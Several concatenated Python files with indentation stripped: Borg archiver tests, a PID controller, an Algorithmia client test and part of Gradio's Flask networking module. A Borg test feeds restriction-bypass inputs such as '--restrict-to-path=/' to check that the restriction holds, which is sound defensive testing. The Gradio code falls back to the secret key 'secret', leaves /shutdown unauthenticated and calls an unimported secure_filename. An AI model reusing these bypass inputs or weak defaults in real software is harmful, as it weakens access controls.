os.rmdir('input/dir_replaced_with_link')
os.symlink('input/dir_added', 'input/dir_replaced_with_link')
os.unlink('input/link_changed')
os.symlink('input/dir_added', 'input/link_changed')
os.symlink('input/dir_added', 'input/link_added')
os.unlink('input/link_replaced_by_file')
self.create_regular_file('link_replaced_by_file', size=16384)
os.unlink('input/link_removed')
if are_hardlinks_supported():
os.unlink('input/hardlink_removed')
os.link('input/file_added', 'input/hardlink_added')
with open('input/empty', 'ab') as fd:
fd.write(b'appended_data')
# Create the second snapshot
self.cmd('create', self.repository_location + '::test1a', 'input')
self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')
def do_asserts(output, can_compare_ids):
# File contents changed (deleted and replaced with a new file)
change = 'B' if can_compare_ids else '{:<19}'.format('modified')
assert 'file_replaced' in output # added to debug #3494
assert '{} input/file_replaced'.format(change) in output
# File unchanged
assert 'input/file_unchanged' not in output
# Directory replaced with a regular file
if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
# Basic directory cases
assert 'added directory input/dir_added' in output
assert 'removed directory input/dir_removed' in output
if are_symlinks_supported():
# Basic symlink cases
assert 'changed link input/link_changed' in output
assert 'added link input/link_added' in output
assert 'removed link input/link_removed' in output
# Symlink replacing or being replaced
assert '] input/dir_replaced_with_link' in output
assert '] input/link_replaced_by_file' in output
# Symlink target removed. Should not affect the symlink at all.
assert 'input/link_target_removed' not in output
# The inode has two links and the file contents changed. Borg
# should notice the changes in both links. However, the symlink
# pointing to the file is not changed.
change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
assert '{} input/empty'.format(change) in output
if are_hardlinks_supported():
assert '{} input/hardlink_contents_changed'.format(change) in output
if are_symlinks_supported():
assert 'input/link_target_contents_changed' not in output
# Added a new file and a hard link to it. Both links to the same
# inode should appear as separate files.
assert 'added 2.05 kB input/file_added' in output
if are_hardlinks_supported():
assert 'added 2.05 kB input/hardlink_added' in output
# check if a diff between non-existent and empty new file is found
assert 'added 0 B input/file_empty_added' in output
# The inode has two links and both of them are deleted. They should
# appear as two deleted files.
assert 'removed 256 B input/file_removed' in output
if are_hardlinks_supported():
assert 'removed 256 B input/hardlink_removed' in output
# Another link (marked previously as the source in borg) to the
# same inode was removed. This should not change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_removed' not in output
# Another link (marked previously as the source in borg) to the
# same inode was replaced with a new regular file. This should not
# change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_replaced' not in output
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
# We expect exit_code=1 due to the chunker params warning
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)
def test_sort_option(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('a_file_removed', size=8)
self.create_regular_file('f_file_removed', size=16)
self.create_regular_file('c_file_changed', size=32)
self.create_regular_file('e_file_changed', size=64)
self.cmd('create', self.repository_location + '::test0', 'input')
os.unlink('input/a_file_removed')
os.unlink('input/f_file_removed')
os.unlink('input/c_file_changed')
os.unlink('input/e_file_changed')
self.create_regular_file('c_file_changed', size=512)
self.create_regular_file('e_file_changed', size=1024)
self.create_regular_file('b_file_added', size=128)
self.create_regular_file('d_file_added', size=256)
self.cmd('create', self.repository_location + '::test1', 'input')
output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
expected = [
'a_file_removed',
'b_file_added',
'c_file_changed',
'd_file_added',
'e_file_changed',
'f_file_removed',
]
assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
archiver = Archiver()
# everything normal:
# first param is argv as produced by ssh forced command,
# second param is like from SSH_ORIGINAL_COMMAND env variable
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --info --umask=0027')
assert args.func == archiver.do_serve
assert args.restrict_to_paths == ['/p1', '/p2']
assert args.umask == 0o027
assert args.log_level == 'info'
# similar, but with --restrict-to-repository
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --info --umask=0027')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break out of path restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --restrict-to-path=/')
assert args.restrict_to_paths == ['/p1', '/p2']
# trying to cheat - break out of repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break below repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/r1/below')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - try to execute different subcommand
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg init --encryption=repokey /')
assert args.func == archiver.do_serve
# Check that environment variables in the forced command don't cause issues. If the command
# were not forced, environment variables would be interpreted by the shell, but this does not
# happen for forced commands - we get the verbatim command line and need to deal with env vars.
args = archiver.get_args(['borg', 'serve', ],
'BORG_FOO=bar borg serve --info')
assert args.func == archiver.do_serve
def test_chunk_content_equal():
def ccc(a, b):
chunks_a = [data for data in a]
chunks_b = [data for data in b]
compare1 = ItemDiff._chunk_content_equal(iter(chunks_a), iter(chunks_b))
compare2 = ItemDiff._chunk_content_equal(iter(chunks_b), iter(chunks_a))
assert compare1 == compare2
return compare1
assert ccc([
b'1234', b'567A', b'bC'
], [
b'1', b'23', b'4567A', b'b', b'C'
])
# one iterator exhausted before the other
assert not ccc([
b'12345',
], [
b'1234', b'56'
])
# content mismatch
assert not ccc([
b'1234', b'65'
], [
b'1234', b'56'
])
# first is the prefix of second
assert not ccc([
b'1234', b'56'
], [
b'1234', b'565'
])
class TestBuildFilter:
@staticmethod
def peek_and_store_hardlink_masters(item, matched):
pass
def test_basic(self):
matcher = PatternMatcher()
matcher.add([parse_pattern('included')], IECommand.Include)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='included'))
assert filter(Item(path='included/file'))
assert not filter(Item(path='something else'))
def test_empty(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='anything'))
def test_strip_components(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
assert not filter(Item(path='shallow'))
assert not filter(Item(path='shallow/')) # can this even happen? paths are normalized...
assert filter(Item(path='deep enough/file'))
assert filter(Item(path='something/dir/file'))
class TestCommonOptions:
@staticmethod
def define_common_options(add_common_option):
add_common_option('-h', '--help', action='help', help='show this help message and exit')
add_common_option('--critical', dest='log_level', help='foo',
action='store_const', const='critical', default='warning')
add_common_option('--error', dest='log_level', help='foo',
action='store_const', const='error', default='warning')
add_common_option('--append', dest='append', help='foo',
action='append', metavar='TOPIC', default=[])
add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
help='(default: %(default)d).')
@pytest.fixture
def basic_parser(self):
parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
parser.common_options = Archiver.CommonOptions(self.define_common_options,
suffix_precedence=('_level0', '_level1'))
return parser
@pytest.fixture
def subparsers(self, basic_parser):
if sys.version_info >= (3, 7):
# py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
else:
# py36 does not support required=... argument (but behaves like required=False).
# note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
return basic_parser.add_subparsers(title='required arguments', metavar='<command>')
@pytest.fixture
def parser(self, basic_parser):
basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
return basic_parser
@pytest.fixture
def common_parser(self, parser):
common_parser = argparse.ArgumentParser(add_help=False, prog='test')
parser.common_options.add_common_group(common_parser, '_level1')
return common_parser
@pytest.fixture
def parse_vars_from_line(self, parser, subparsers, common_parser):
subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
description='foo', epilog='bar', help='baz',
formatter_class=argparse.RawDescriptionHelpFormatter)
subparser.set_defaults(func=1234)
subparser.add_argument('--append-only', dest='append_only', action='store_true')
def parse_vars_from_line(*line):
print(line)
args = parser.parse_args(line)
parser.common_options.resolve(args)
return vars(args)
return parse_vars_from_line
def test_simple(self, parse_vars_from_line):
assert parse_vars_from_line('--error') == {
'append': [],
'lock_wait': 1,
'log_level': 'error',
'progress': False
}
assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
'append': [],
'lock_wait': 1,
'log_level': 'critical',
'progress': False,
'append_only': False,
'func': 1234,
}
with pytest.raises(SystemExit):
parse_vars_from_line('--append-only', 'subcommand')
assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
'append': ['foo', 'bar', 'baz'],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
@pytest.mark.parametrize('position', ('before', 'after', 'both'))
@pytest.mark.parametrize('flag,args_key,args_value', (
('-p', 'progress', True),
('--lock-wait=3', 'lock_wait', 3),
))
def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
line = []
if position in ('before', 'both'):
line.append(flag)
line.append('subcommand')
if position in ('after', 'both'):
line.append(flag)
result = {
'append': [],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
result[args_key] = args_value
assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
assert parse_storage_quota('50M') == 50 * 1000**2
with pytest.raises(argparse.ArgumentTypeError):
parse_storage_quota('5M')
def get_all_parsers():
"""
Return dict mapping command to parser.
"""
parser = Archiver(prog='borg').build_parser()
borgfs_parser = Archiver(prog='borgfs').build_parser()
parsers = {}
def discover_level(prefix, parser, Archiver, extra_choices=None):
choices = {}
for action in parser._actions:
if action.choices is not None and 'SubParsersAction' in str(action.__class__):
for cmd, parser in action.choices.items():
choices[prefix + cmd] = parser
if extra_choices is not None:
choices.update(extra_choices)
if prefix and not choices:
return
for command, parser in sorted(choices.items()):
discover_level(command + " ", parser, Archiver)
parsers[command] = parser
discover_level("", parser, Archiver, {'borgfs': borgfs_parser})
return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
if isinstance(parser.epilog, RstToTextLazy):
assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
assert str(rst_to_terminal(helptext))
|
pid.py |
# -*- coding: utf-8 -*-
'''
Created on 11/04/2015
@author: david
'''
import logging
from threading import Thread
import time
class Pid(object):
'''
Proportional Integrative Derivative stabilizer
'''
#Period range to be considered as correct loop rate
PERIOD_RANGE_MARGIN = 0.1
def __init__(self, period, length, readInputDelegate, setOutputDelegate, pidName = ""):
'''
Constructor
@param period: Timerate to perform each calculation
@param length: Number of items to stabilize
@param readInputDelegate: Method to gather current values.
Must return an array with the same number of items to stabilize
@param setOutputDelegate: Delegate's param is an array with the values to react,
one for each item to stabilize.
@param pidName: (optional) Name to identify the PID-thread among other ones.
'''
self._pidName = pidName
self._targets = [0.0] * length
self._integrals = [0.0] * length
self._lastErrors = [0.0] * length
self._period = period
self._minPeriod = period * (1.0 - Pid.PERIOD_RANGE_MARGIN)
self._maxPeriod = period * (1.0 + Pid.PERIOD_RANGE_MARGIN)
self._periodTarget = (self._minPeriod + self._period) / 2.0
self._previousTime = time.time()
self._currentPeriod = period
self._kp = [0.0] * length
self._ki = [0.0] * length
self._kd = [0.0] * length
self._readInput = readInputDelegate
self._setOutput = setOutputDelegate
self._isRunning = False
self._isPaused = False
self._thread = None
self._length = length
self._integralLocked = [False] * length
self._deltaTimeSum = 0.0
self._iterationCount = 0
def setProportionalConstants(self, kpMatrix):
"""
@param kpMatrix: Proportional constant array. One for each item to stabilize
"""
if self._length == len(kpMatrix):
self._kp = kpMatrix
else:
raise Exception("Wrong matrix length")
return self
def setIntegralConstants(self, kiMatrix):
"""
@param kiMatrix: Integral constant array. One for each item to stabilize
"""
if self._length == len(kiMatrix):
self._ki = kiMatrix
else:
raise Exception("Wrong matrix length")
return self
def setDerivativeConstants(self, kdMatrix):
"""
@param kdMatrix: Derivative constant array. One for each item to stabilize
"""
if self._length == len(kdMatrix):
self._kd = kdMatrix
else:
raise Exception("Wrong matrix length")
return self
def getProportionalConstants(self):
"""
@return: Proportional constants array
"""
return self._kp
def getIntegralConstants(self):
"""
@return: Integral constants array
"""
return self._ki
def getDerivativeConstants(self):
"""
@return: Derivative constants array
"""
return self._kd
def _calculate(self):
"""
Performs the stabilization
"""
outputArray = [0.0]*self._length
currentValues = self._readInput()
currentTime = time.time()
dt = currentTime - self._previousTime
for i in range(self._length):
error = self._targets[i] - currentValues[i]
#Proportional stabilization
pPart = self._kp[i] * error
#Integral stabilization
if not self._integralLocked[i]:
self._integrals[i] += error * dt
iPart = self._ki[i] * self._integrals[i]
#Derivative stabilization
dPart = self._kd[i] * (error - self._lastErrors[i]) / dt
self._lastErrors[i] = error
#Join partial results
result = pPart + iPart + dPart
outputArray[i] = result
self._previousTime = currentTime
self._setOutput(outputArray)
self._currentPeriod = dt
self._deltaTimeSum += dt
self._iterationCount += 1
def setTarget(self, target, index):
"""
Sets target for any item
@param target: Value to reach
@param index: Item to change
"""
self._targets[index] = target
def setTargets(self, targets):
"""
Sets targets
@param targets: Array with the targets to reach. One for each item to stabilize.
"""
self._targets = targets
def getTarget(self, index):
"""
Gets the current target for an item
@param index: Item index
@return: Current target
"""
return self._targets[index]
def getTargets(self):
"""
Gets all current targets
@return: Array of current targets
"""
return self._targets
def getCurrentPeriod(self):
"""
Gets the current target period
@return: Current target period
"""
return self._currentPeriod
def _do(self):
"""
Performs the stabilization
"""
dtSum = 0.0
iterCount = 0
underFreq = 0
overFreq = 0
rightFreq = 0
acceptableFreq = 0
sleepErrorSum = 0.0
sleepTime = self._period
self._previousTime = time.time()
time.sleep(self._period)
while self._isRunning:
t0 = time.time()
self._calculate()
calculationTime = time.time() - t0
dtSum += calculationTime
iterCount += 1
if self._currentPeriod < self._minPeriod:
overFreq += 1
elif self._currentPeriod >= self._minPeriod and self._currentPeriod <= self._period:
rightFreq += 1
elif self._currentPeriod > self._period and self._currentPeriod <= self._maxPeriod:
acceptableFreq += 1
else:
underFreq += 1
freq = 1.0/self._maxPeriod
currentFreq = 1.0/self._currentPeriod
message="I cannot operate at min. {0:.3f}Hz. Current rate is {1:.3f}Hz".format(freq, currentFreq)
#print message
logging.debug(message)
sleepError = self._period - self._currentPeriod
sleepErrorSum += sleepError
sleepTime += 0.6 * sleepError + 0.2 * sleepErrorSum
if sleepTime > 0.0:
time.sleep(sleepTime)
else:
time.sleep(0.001)
if dtSum != 0.0 and iterCount != 0:
tAvg = dtSum * 1000.0 / iterCount
fAvg = float(iterCount) / dtSum
else:
tAvg = 0.0
fAvg = float("inf")
message = "PID-{0} (net values) t: {1:.3f}ms; f: {2:.3f}Hz".format(self._pidName, tAvg, fAvg)
logging.info(message)
#print message
underFreqPerc = underFreq * 100.0 / iterCount
overFreqPerc = overFreq * 100.0 / iterCount
rightFreqPerc = rightFreq * 100.0 / iterCount
acceptableFreqPerc = acceptableFreq * 100.0 / iterCount
message = "In freq: {0:.3f}%; Acceptable: {1:.3f}%; Under f.: {2:.3f}%; Over f.: {3:.3f}%"\
.format(rightFreqPerc, acceptableFreqPerc, underFreqPerc, overFreqPerc)
logging.info(message)
#print message
def start(self):
"""
Starts stabilization.
Inits a thread to perform calculations in background
"""
if not self._isPaused and (self._thread == None or not self._thread.isAlive()):
logging.info("Starting PID-{0}".format(self._pidName))
self._deltaTimeSum = 0.0
self._iterationCount = 0
#Reset PID variables
length = len(self._kp)
self._integrals = [0.0] * length
self._lastErrors = [0.0] * length
self._isRunning = True
self._thread = Thread(target=self._do)
self._thread.start()
def stop(self):
"""
Stops the stabilization.
"""
self._isRunning = False
self._isPaused = False
if self._thread != None and self._thread.isAlive():
self._thread.join()
logging.info("PID-{0} stopped".format(self._pidName))
if self._iterationCount != 0 and self._deltaTimeSum != 0.0:
averageDeltaTime = self._deltaTimeSum * 1000.0/ self._iterationCount
averageFrequency = self._iterationCount / self._deltaTimeSum
else:
averageDeltaTime = 0.0
averageFrequency = float("inf")
message = "PID-\"{0}\" - Avg. time: {1:.3f}ms - Avg. freq: {2:.3f}Hz".format(self._pidName, averageDeltaTime, averageFrequency)
#print message
logging.info(message)
def pause(self):
'''
Pauses the stabilization
'''
if self._isRunning and self._thread != None and self._thread.isAlive():
self._isRunning = False
self._isPaused = True
self._thread.join()
logging.info("PID-{0} paused".format(self._pidName))
def resume(self):
'''
Resumes the stabilization
'''
if self._isPaused and (self._thread == None or not self._thread.isAlive()):
logging.info("Resuming PID-{0}".format(self._pidName))
self._isRunning = True
self._isPaused = False
self._thread = Thread(target=self._do)
self._thread.start()
def isRunning(self):
"""
@return: Reports whether the PID stabilization is currently running
"""
return self._isRunning
def isPaused(self):
'''
@return: Reports whether the PID stabilization is currently paused
'''
return self._isPaused
def lockIntegral(self, index):
"""
Locks the result's integral part of any item
@param index: Item index
"""
self._integralLocked[index] = True
def unlockIntegral(self, index):
"""
Unlocks the result's integral part of any item
@param index: Item index
"""
self._integralLocked[index] = False
def resetIntegral(self, index):
"""
Sets to zero the integral of any item
@param index: Item index
"""
self._integrals[index] = 0.0
def resetIntegrals(self):
'''
Sets to zero all integrals
'''
length = len(self._kp)
self._integrals = [0.0] * length
def resetTime(self):
"""
Resets the time
"""
self._previousTime = time.time()
|
algo_failure_test.py | import sys
if sys.version_info[0] >= 3:
import unittest
import Algorithmia
import uvicorn
import time
from multiprocessing import Process
# look in ../ BEFORE trying to import Algorithmia. If you append to the
# you will load the version installed on the computer.
sys.path = ['../'] + sys.path
from requests import Response
from Test.api import app
def start_webserver():
uvicorn.run(app, host="127.0.0.1", port=8080, log_level="debug")
class AlgoTest(unittest.TestCase):
error_500 = Response()
error_500.status_code = 500
def setUp(self):
self.client = Algorithmia.client(api_address="http://localhost:8080")
self.uvi_p = Process(target=start_webserver)
self.uvi_p.start()
time.sleep(1)
def tearDown(self):
self.uvi_p.terminate()
def test_throw_500_error_HTTP_response_on_algo_request(self):
try:
result = self.client.algo('util/500').pipe(bytearray('foo', 'utf-8'))
except Exception as e:
result = e
pass
self.assertEqual(str(self.error_500), str(result))
|
networking.py | """
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from flask import Flask, request, session, jsonify, abort, send_file, render_template, redirect
from flask_cachebuster import CacheBuster
from flask_login import LoginManager, login_user, current_user, login_required
from flask_cors import CORS
import threading
import pkg_resources
import datetime
import time
import json
import urllib.request
from shutil import copyfile
import requests
import sys
import csv
import logging
from gradio.tunneling import create_tunnel
from gradio import encryptor
from gradio import queue
from functools import wraps
import io
import inspect
import traceback
from werkzeug.security import safe_join
INITIAL_PORT_VALUE = int(os.getenv(
'GRADIO_SERVER_PORT', "7860")) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = int(os.getenv(
'GRADIO_NUM_PORTS', "100")) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv(
'GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
GRADIO_FEATURE_ANALYTICS_URL = "https://api.gradio.app/gradio-feature-analytics/"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "templates/frontend/static")
VERSION_FILE = pkg_resources.resource_filename("gradio", "version.txt")
with open(VERSION_FILE) as version_file:
GRADIO_STATIC_ROOT = "https://gradio.s3-us-west-2.amazonaws.com/" + \
version_file.read().strip() + "/static/"
app = Flask(__name__,
template_folder=STATIC_TEMPLATE_LIB,
static_folder="",
static_url_path="/none/")
app.url_map.strict_slashes = False
CORS(app)
cache_buster = CacheBuster(
config={'extensions': ['.js', '.css'], 'hash_size': 5})
cache_buster.init_app(app)
app.secret_key = os.getenv("GRADIO_KEY", "secret")
login_manager = LoginManager()
login_manager.login_view = 'login'
login_manager.init_app(app)
# Hide Flask default message
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
class User:
def __init__(self, id):
self.is_authenticated = True
self.is_active = True
self.is_anonymous = False
self.id = id
def get_id(self):
return self.id
@login_manager.user_loader
def load_user(_id):
return User(_id)
def login_check(func):
@wraps(func)
def wrapper(*args, **kwargs):
if app.auth:
@login_required
def func2(*args, **kwargs):
return func(*args, **kwargs)
return func2(*args, **kwargs)
else:
return func(*args, **kwargs)
return wrapper
def get_local_ip_address():
try:
ip_address = requests.get('https://api.ipify.org', timeout=3).text
except (requests.ConnectionError, requests.exceptions.ReadTimeout):
ip_address = "No internet connection"
return ip_address
IP_ADDRESS = get_local_ip_address()
def get_first_available_port(initial, final):
"""
Gets the first open port in a specified range of port numbers
:param initial: the initial value in the range of port numbers
:param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
:return:
"""
for port in range(initial, final):
try:
s = socket.socket() # create a socket object
s.bind((LOCALHOST_NAME, port)) # Bind to the port
s.close()
return port
except OSError:
pass
raise OSError(
"All ports from {} to {} are in use. Please close a port.".format(
initial, final
)
)
@app.route("/", methods=["GET"])
@login_check
def main():
session["state"] = None
return render_template("frontend/index.html", config=app.interface.config)
@app.route("/static/<path:path>", methods=["GET"])
def static_resource(path):
if app.interface.share:
return redirect(GRADIO_STATIC_ROOT + path)
else:
return send_file(safe_join(STATIC_PATH_LIB, path))
# TODO(@aliabid94): this throws a 500 error if app.auth is None (should probalbly just redirect to '/')
@app.route('/login', methods=["GET", "POST"])
def login():
if request.method == "GET":
config = get_config()
return render_template("frontend/index.html", config=config)
elif request.method == "POST":
username = request.form.get("username")
password = request.form.get("password")
if ((not callable(app.auth) and username in app.auth and app.auth[username] == password)
or (callable(app.auth) and app.auth.__call__(username, password))):
login_user(User(username))
return redirect("/")
else:
return abort(401)
@app.route("/config/", methods=["GET"])
def get_config():
if app.interface.auth is None or current_user.is_authenticated:
return jsonify(app.interface.config)
else:
return {"auth_required": True, "auth_message": app.interface.auth_message}
@app.route("/enable_sharing/<path:path>", methods=["GET"])
@login_check
def enable_sharing(path):
if path == "None":
path = None
app.interface.config["share_url"] = path
return jsonify(success=True)
@app.route("/shutdown", methods=['GET'])
def shutdown():
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func is None:
raise RuntimeError('Not running werkzeug')
shutdown_func()
return "Shutting down..."
@app.route("/api/predict/", methods=["POST"])
@login_check
def predict():
raw_input = request.json["data"]
# Capture any errors made and pipe to front end
if app.interface.show_error:
try:
prediction, durations = app.interface.process(raw_input)
except BaseException as error:
traceback.print_exc()
return jsonify({"error": str(error)}), 500
else:
prediction, durations = app.interface.process(raw_input)
avg_durations = []
for i, duration in enumerate(durations):
app.interface.predict_durations[i][0] += duration
app.interface.predict_durations[i][1] += 1
avg_durations.append(app.interface.predict_durations[i][0]
/ app.interface.predict_durations[i][1])
app.interface.config["avg_durations"] = avg_durations
output = {"data": prediction, "durations": durations, "avg_durations": avg_durations}
if app.interface.allow_flagging == "auto":
try:
flag_index = flag_data(raw_input, prediction,
flag_option=(None if app.interface.flagging_options is None else ""),
username=current_user.id if current_user.is_authenticated else None)
output["flag_index"] = flag_index
except Exception as e:
print(str(e))
pass
return jsonify(output)
def get_types(cls_set, component):
docset = []
types = []
if component == "input":
for cls in cls_set:
doc = inspect.getdoc(cls.preprocess)
doc_lines = doc.split("\n")
docset.append(doc_lines[1].split(":")[-1])
types.append(doc_lines[1].split(")")[0].split("(")[-1])
else:
for cls in cls_set:
doc = inspect.getdoc(cls.postprocess)
doc_lines = doc.split("\n")
docset.append(doc_lines[-1].split(":")[-1])
types.append(doc_lines[-1].split(")")[0].split("(")[-1])
return docset, types
@app.route("/api/", methods=["GET"])
def api_docs():
inputs = [type(inp) for inp in app.interface.input_components]
outputs = [type(out) for out in app.interface.output_components]
input_types_doc, input_types = get_types(inputs, "input")
output_types_doc, output_types = get_types(outputs, "output")
input_names = [type(inp).__name__ for inp in app.interface.input_components]
output_names = [type(out).__name__ for out in app.interface.output_components]
sample_inputs = [inp.generate_sample() for inp in app.interface.input_components]
docs = {
"inputs": input_names,
"outputs": output_names,
"len_inputs": len(inputs),
"len_outputs": len(outputs),
"inputs_lower": [name.lower() for name in input_names],
"outputs_lower": [name.lower() for name in output_names],
"input_types": input_types,
"output_types": output_types,
"input_types_doc": input_types_doc,
"output_types_doc": output_types_doc,
"sample_inputs": sample_inputs
}
return render_template("api_docs.html", **docs)
def log_feature_analytics(feature):
if app.interface.analytics_enabled:
try:
requests.post(GRADIO_FEATURE_ANALYTICS_URL,
data={
'ip_address': IP_ADDRESS,
'feature': feature}, timeout=3)
except (requests.ConnectionError, requests.exceptions.ReadTimeout):
pass # do not push analytics if no network
def flag_data(input_data, output_data, flag_option=None, flag_index=None, username=None, flag_path=None):
if flag_path is None:
flag_path = os.path.join(app.cwd, app.interface.flagging_dir)
log_fp = "{}/log.csv".format(flag_path)
encryption_key = app.interface.encryption_key if app.interface.encrypt else None
is_new = not os.path.exists(log_fp)
if flag_index is None:
csv_data = []
for i, interface in enumerate(app.interface.input_components):
csv_data.append(interface.save_flagged(
flag_path, app.interface.config["input_components"][i]["label"], input_data[i], encryption_key))
for i, interface in enumerate(app.interface.output_components):
csv_data.append(interface.save_flagged(
flag_path, app.interface.config["output_components"][i]["label"], output_data[i], encryption_key) if output_data[i] is not None else "")
if flag_option is not None:
csv_data.append(flag_option)
if username is not None:
csv_data.append(username)
csv_data.append(str(datetime.datetime.now()))
if is_new:
headers = [interface["label"]
for interface in app.interface.config["input_components"]]
headers += [interface["label"]
for interface in app.interface.config["output_components"]]
if app.interface.flagging_options is not None:
headers.append("flag")
if username is not None:
headers.append("username")
headers.append("timestamp")
def replace_flag_at_index(file_content):
file_content = io.StringIO(file_content)
content = list(csv.reader(file_content))
header = content[0]
flag_col_index = header.index("flag")
content[flag_index][flag_col_index] = flag_option
output = io.StringIO()
writer = csv.writer(output)
writer.writerows(content)
return output.getvalue()
if app.interface.encrypt:
output = io.StringIO()
if not is_new:
with open(log_fp, "rb") as csvfile:
encrypted_csv = csvfile.read()
decrypted_csv = encryptor.decrypt(
app.interface.encryption_key, encrypted_csv)
file_content = decrypted_csv.decode()
if flag_index is not None:
file_content = replace_flag_at_index(file_content)
output.write(file_content)
writer = csv.writer(output)
if flag_index is None:
if is_new:
writer.writerow(headers)
writer.writerow(csv_data)
with open(log_fp, "wb") as csvfile:
csvfile.write(encryptor.encrypt(
app.interface.encryption_key, output.getvalue().encode()))
else:
if flag_index is None:
with open(log_fp, "a", newline="") as csvfile:
writer = csv.writer(csvfile)
if is_new:
writer.writerow(headers)
writer.writerow(csv_data)
else:
with open(log_fp) as csvfile:
file_content = csvfile.read()
file_content = replace_flag_at_index(file_content)
with open(log_fp, "w", newline="") as csvfile: # newline parameter needed for Windows
csvfile.write(file_content)
with open(log_fp, "r") as csvfile:
line_count = len([None for row in csv.reader(csvfile)]) - 1
return line_count
@app.route("/api/flag/", methods=["POST"])
@login_check
def flag():
log_feature_analytics('flag')
data = request.json['data']
flag_data(data['input_data'], data['output_data'], data.get("flag_option"), data.get("flag_index"),
current_user.id if current_user.is_authenticated else None)
return jsonify(success=True)
@app.route("/api/interpret/", methods=["POST"])
@login_check
def interpret():
log_feature_analytics('interpret')
raw_input = request.json["data"]
interpretation_scores, alternative_outputs = app.interface.interpret(
raw_input)
return jsonify({
"interpretation_scores": interpretation_scores,
"alternative_outputs": alternative_outputs
})
@app.route("/file/<path:path>", methods=["GET"])
@login_check
def file(path):
path = secure_filename(path)
if app.interface.encrypt and isinstance(app.interface.examples, str) and path.startswith(app.interface.examples):
with open(os.path.join(app.cwd, path), "rb") as encrypted_file:
encrypted_data = encrypted_file.read()
file_data = encryptor.decrypt(
app.interface.encryption_key, encrypted_data)
return send_file(io.BytesIO(file_data), attachment_filename=os.path.basename(path))
else:
return send_file(os.path.join(app.cwd, path))
@app.route("/api/queue/push/", methods=["POST"])
@login_check
def queue_push():
data = request.json["data"]
action = request.json["action"]
job_hash, queue_position = queue.push({"data": data}, action)
return {"hash": job_hash, "queue_position": queue_position}
@app.route("/api/queue/status/", methods=["POST"])
@login_check
def queue_status():
hash = request.json['hash']
status, data = queue.get_status(hash)
return {"status": status, "data": data}
def queue_thread(path_to_local_server, test_mode=False):
while True:
try:
next_job = queue.pop()
if next_job is not None:
_, hash, input_data, task_type = next_job
queue.start_job(hash)
response = requests.post(
path_to_local_server + "/api/" + task_type + "/", json=input_data)
if response.status_code == 200:
queue.pass_job(hash, response.json())
else:
queue.fail_job(hash, response.text)
else:
time.sleep(1)
except Exception as e:
time.sleep(1)
pass
if test_mode:
break
def start_server(interface, server_name, server_port, auth=None, ssl=None):
port = get_first_available_port(
server_port, server_port + TRY_NUM_PORTS
)
path_to_local_server = "http://{}:{}/".format(server_name, port)
if auth is not None:
if not callable(auth):
app.auth = {account[0]: account[1] for account in auth}
else:
app.auth = auth
else:
app.auth = None
app.interface = interface
app.cwd = os.getcwd()
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
if app.interface.enable_queue:
